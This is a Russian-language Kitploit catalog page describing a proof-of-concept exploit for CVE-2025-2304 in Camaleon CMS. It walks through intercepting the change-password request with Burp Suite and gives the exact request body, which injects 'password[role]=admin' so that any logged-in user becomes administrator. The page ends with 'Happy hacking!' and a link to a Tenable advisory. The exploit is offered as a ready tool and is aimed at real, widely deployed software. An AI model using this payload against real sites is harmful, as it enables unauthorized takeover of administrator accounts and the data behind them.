Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-2304_POC — CVE-2025-2304 POC - Camaleon CMS Privilege Escalation | Kitploit
Инструменты/GitHubGitHub/azureadtrent/cve-2025-2304_poc
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubazureadtrent/cve-2025-2304_poc

CVE-2025-2304_POC

CVE-2025-2304 POC - Camaleon CMS Privilege Escalation

Репозиторий
16 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-2304_POC

CVE-2025-2304 POC - Эскалация привилегий Camaleon CMS

Данный POC используется для повышения привилегий в Camaleon CMS до уровня администратора. Эксплойт работает путём внедрения роли в функцию сброса пароля аутентифицированного пользователя.


Предварительные требования и допущения

  • У вас есть учётная запись пользователя на целевой Camaleon CMS, которая может получить доступ к /admin.

1. Перехват

Начните с входа в свою учётную запись. После входа перейдите на страницу профиля и нажмите «Изменить пароль». Захватите функцию изменения пароля с помощью Burp Suite.


2. Изменение полезной нагрузки

Используя приведённый ниже пример, отредактируйте полезную нагрузку, добавив роль.

root@kitploit:~
_method=patch&authenticity_token=gHl57BgeyzdyiC3AzDPgwY2Wn82rjrWNXG_1cCnZbPgg4tkN8_u2nWtqBusMawZOrXpkh0hHXDYhpojYXvVTvQ&password%5Bpassword%5D=test1234&password%5Bpassword_confirmation%5D=test1234&password%5Brole%5D=admin

Добавив %5Brole%5D=admin в полезную нагрузку, вы получите права администратора.


3. Обновление страницы

Обновите страницу, и теперь вы администратор.

Удачного взлома!

Ресурсы

https://www.tenable.com/security/research/tra-2025-09

Скачать инструмент